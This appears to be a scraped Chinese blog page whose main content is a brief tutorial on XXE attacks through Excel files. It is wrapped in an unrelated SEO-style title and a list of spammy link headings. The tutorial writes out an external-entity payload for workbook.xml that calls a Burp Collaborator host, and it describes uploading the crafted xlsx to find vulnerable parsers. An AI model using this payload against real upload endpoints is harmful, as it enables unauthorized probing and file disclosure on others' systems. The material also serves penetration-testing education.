当前位置: 首页 > news >正文

事业单位网站建设的账务处理合肥seo排名优化

事业单位网站建设的账务处理,合肥seo排名优化,网站维护是谁做的,如何做热词网站利用EXCEL进行XXE攻击 原因 原因 Microsoft Office从2007版本引入了新的开放的XML文件格式,新的XML文件格式基于压缩的ZIP文件格式规范,由许多部分组成。 我们可以将其解压缩到特定的文件夹中来查看其包含的文件夹和文件,可以发现其中多数是…

利用EXCEL进行XXE攻击

  • 原因

原因

Microsoft Office从2007版本引入了新的开放的XML文件格式,新的XML文件格式基于压缩的ZIP文件格式规范,由许多部分组成。

我们可以将其解压缩到特定的文件夹中来查看其包含的文件夹和文件,可以发现其中多数是描述工作簿数据、元数据、文档信息的XML文件。

我们创建一个excle,并解压

xl/drawings/drawing1.xml
xl/worksheets/sheet1.xml
xl/worksheets/_rels/sheet1.xml.rels
xl/sharedStrings.xml
xl/styles.xml
xl/workbook.xml
xl/_rels/workbook.xml.rels
_rels/.rels
[Content_Types].xml

在这里插入图片描述
需要修改workbook.xml文件,以下内容插入第2行和第3行,SYSTEM后面自己添加相对应的dns记录均可,我习惯使用burp的collaborator模块

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://gtdwmy7gvrncy5rvfu11kxzl2c82wr.burpcollaborator.net/"> ]>
<x>&xxe;</x>

添加好后重新打包成excle的后缀,如xxe.xlsx
此时恶意文件就做好了,找到对应的文件上传的接口,直接上传excle文件,观察dns是否有记录

http://www.yayakq.cn/news/600023/

相关文章:

  • 各大网站注册记录做单位网站
  • 网站建设注意事项移动网站建设专业论文
  • 同字形结构布局网站成都网站建设 工作室
  • 聊城医院网站建设货源网站开发
  • 建设网站怎样分配给用户空间佛山优化公司推广
  • 网站登录密码怎么取消保存云相册网站怎么做
  • 国内做五金加工的订单网站阿里虚拟机建设网站
  • 专业定制网站公司兼职网站高中生在家可做
  • 个人备案网站内容cosy主题wordpress
  • wordpress++分页优化方案官方网站
  • 做网站开发的想接私活做网站的公司找客户
  • 重庆企业型网站建设优书网打不开了
  • 涡阳在北京做网站的名人长沙 php企业网站系统
  • 网页制作与网站建设宝典 pdf如何将自己做的网站放到网上去
  • 建设工程质量安全管理体系网站比较好的做网站的公司
  • 寻花问柳-专注做一家男人的网站猪网站开发的pc或移动端
  • 网站地图怎么做一键导航展会设计公司简介
  • 制作外贸网站公司网页设计心得体会报告怎么写
  • 浙江网站建设多少钱高度重视网站建设 利用网站 接受监督
  • app商城网站开发网站建设方案ppt
  • 宁波网站建设公司优选亿企邦科技股龙头
  • 上海企业网站建设制网站怎么排版
  • 如何优化百度seo排名可以做关键词优化的免费网站
  • 搜索引擎是软件还是网站WordPress更改角色插件
  • 下沙经济开发区建设局网站做名片赞机器人电脑网站是多少钱
  • 如何破解网站后台账号和密码电商主题wordpress
  • 企业网站管理系统多少钱一年找平台推广
  • 增城网站建设推广苏州电子商务网站开发公司
  • 宣传工作网站建设作用株洲做网站的公司
  • 做视频网站带宽要wordpress主题申请软著吗